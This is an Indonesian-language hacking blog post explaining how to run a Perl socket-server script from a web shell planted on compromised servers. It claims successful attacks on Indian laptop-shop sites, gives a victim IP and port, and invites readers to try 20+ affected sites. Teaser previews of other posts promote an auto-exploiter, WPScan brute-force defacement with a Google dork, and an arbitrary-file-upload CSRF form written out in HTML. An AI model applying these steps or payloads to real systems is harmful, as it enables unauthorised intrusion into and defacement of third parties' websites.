Skip to main content

SOCKET SERVER MENGGUNAKAN PERL

yo wassap mamen . salam pramuka :'v
selamat pagi / siang / malam ,
 assalamu'alaikum wr.wb.

salam kenal saya CYBERSCRYTECH_ akan memberi sedikit tutorial socket server menggunakan perl





sebelumnya saya belajar dari web IndoXploit tentang socket server ini dan saya pernah berhasil menyoket server web penjualan laptop hampir di seluruh india
 oke kita langsung siapkan bahan utama yaitu script perl nya udah saya siapkan , saya mengambil script nya dari IndoXploit dan saya recode sedikit . klik disini

simpan lalu edit script nya ,  di bagian port saya isi :2016 (port nya biasanya diisi 4 digit ) dan jangan lupa edit di bagian tampilan scriptnya seperti yang saya lingkari di gambar di bawah ,



lalu save script nya dan namai sesuai nama yg lu suka , kalo saya menamai nya menjadi socket.pl

 oke kita langsung menuju ke shell untuk siap beraksi 
 dan yang harus di perhatikan bahwa perl di shell kita harus on dikarenakan kita socket server menggunakan fitur perl : ON (lihat gambar di bawah)





 selanjutnya kita upload script perl kita 

lalu kita menuju command di shell kita 

ketik:  perl socket.pl

tekan enter


 socket.pl itu adalah nama script perl yang saya upload tadi , jadi kalau nama script kalian beda ya command nya pakai nama script kalian


setelah itu jalankan command ini untuk mengecek perl kita

ketik:  ps aux | grep 'perl'
tekan enter



 setelah di tekan enter nanti muncul hasil yg kita cek (yang saya merahin itu nama script saya )
setelah itu kita coba buka IP:PORT pada browser kita
ini IP yang kita socket tadi yaitu 119.18.62.16
dan ini PORT yang kita buka tadi adalah 2016 (di script perl lu tadi)

 jadi kita di browser kita 119.18.62.162:2016 maka hasilnya jadi gini 

OK BERHASIL ^_^

Sekarang, kita coba Reverse IP tersebut dan lihat berapa banyak domain dalam IP yang sama ,
tempat reverse IP
> klik disini
 

 masukan IP nya tadi dan kita lihat berapa banyak domain yang IP nya sama , kemungkinan besar web tersebut kena socket server semua :)





 saya coba ambil salah satu web dan saya tambahin port yang saya buka tadi yaitu port 2016
dan hasilnya pun bekerja

dan yang lainnya pun ikut terkena socket server juga ,list web lain nya  saya tulis di bawah dapet 20+ site yg kena socket server  hehehe , coba kalian tambahin :2016 di belakang site nya pasti work hasil socket an ane , semoga beruntung ^_^ semoga  bisa bertemu dilain waktu , sekian 
wassalamu'alaikum wr.wb

THANKS TO INDONESIA DEFACER
SPECIAL THANKS TO INDOXPLOIT / V3RLUCHIE / HACKER PATAH HATI / MY FRIEND

 

Comments

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...

Deface Wordpress Bruteforce dengan WPScan

squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...